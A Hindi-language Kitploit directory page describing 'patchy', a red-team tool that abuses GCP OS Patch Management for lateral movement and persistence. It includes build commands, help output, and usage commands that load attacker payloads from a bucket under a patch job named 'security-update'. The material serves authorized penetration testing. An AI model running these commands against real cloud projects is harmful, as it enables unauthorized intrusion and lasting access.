Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
patchy — GCP पैच प्रबंधन का उपयोग करके स्वचालित स्थिरता और पार्श्व संचलन | Kitploit
उपकरण/GitHubGitHub/rek7/patchy
स्थायित्व तंत्रशोषणपार्श्व आंदोलनपेनिट्रेशन टेस्टिंगक्लाउड सुरक्षारेड टीमिंग
GitHubrek7/patchy

patchy

GCP पैच प्रबंधन का उपयोग करके स्वचालित स्थिरता और पार्श्व संचलन

रिपॉजिटरी देखें
1614 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Patchy

GCP OS पैच प्रबंधन का दुरुपयोग करके स्वचालित पार्श्व संचलन और स्थायित्व, मेरे ब्लॉग पोस्ट पर आधारित।

Patchy दो मुख्य मोडों से बना है: पार्श्व संचलन और स्थायित्व। स्थायित्व वैध सेवा खाता क्रेडेंशियल का उपयोग करके एक पैच जॉब या डिप्लॉयमेंट बनाता है। पार्श्व संचलन प्रोजेक्ट के भीतर सभी कंप्यूट इंस्टेंस तक पहुँच प्राप्त करने का प्रयास करता है। इसके उपयोग के लिए, इसे मेटाडेटा API उपलब्ध होने वाले GCP वातावरण में होना चाहिए। पार्श्व संचलन में एक मोड है जो यह देखने में सक्षम बनाता है कि क्या बिना किसी आक्रामक प्रयास के शोषण संभव है (यह देखने के लिए अच्छा है कि आपका वातावरण सुरक्षित है या नहीं)।

सुविधा सुझावों के लिए कृपया एक issue खोलें। यदि कोई समस्या है तो कृपया अपने सुधार के साथ एक PR बनाएँ।

बिल्ड निर्देश

विंडोज

mkdir build;GOOS=windows GOARCH=amd64 go build -o build/patchy.exe ./cmd/patchy/*.go

लिनक्स

mkdir build;GOOS=linux GOARCH=amd64 go build -o build/patchy ./cmd/patchy/*.go

कृपया ध्यान दें कि इसके लिए >= go 1.19 आवश्यक है

उपयोग

root@kitploit:~
$ ./patchy -h
d8888b.  .d8b.  d888888b  .o88b. db   db db    db
88  `8D d8' `8b `~~88~~' d8P  Y8 88   88 `8b  d8'
88oodD' 88ooo88    88    8P      88ooo88  `8bd8'
88~~~   88~~~88    88    8b      88~~~88    88
88      88   88    88    Y8b  d8 88   88    88
88      YP   YP    YP     `Y88P' YP   YP    YP
        https://github.com/rek7/patchy
Patchy is a GCP exploitation tool designed for red teaming engagements.

Based on https://blog.raphael.karger.is/articles/2022-08/GCP-OS-Patching

Usage:
  patchy [flags]
  patchy [command]

Available Commands:
  completion  Generate the autocompletion script for the specified shell
  help        Help about any command
  lateral     Performs automatic lateral movement within a GCP environment
  persist     enables persistence on compute instances owned by service account

Flags:
  -b, --bucket string     bucket name hosting payload
  -h, --help              help for patchy
  -l, --lpayload string   name of linux shell payload (default "payload.bash")
  -p, --persist           enable persistence (patch deployment) (default false)
  -n, --pname string      name of patch deployment/job (default "security-update")
  -w, --wpayload string   name of windows powershell payload (default "payload.ps1")

Use "patchy [command] --help" for more information about a command.

उदाहरण

स्थानीय GCP वातावरण में सेवा खातों का शोषण करना, myBucket पेलोड होस्ट करने वाली सार्वजनिक बकेट का नाम है:

$ ./patchy -b myBucket lat -e

JSON प्रारूप में सेवा खाते का उपयोग करके स्थायित्व स्थापित करना:

$ ./patchy -b myBucket persist -c serviceAccount.json

टूल डाउनलोड करें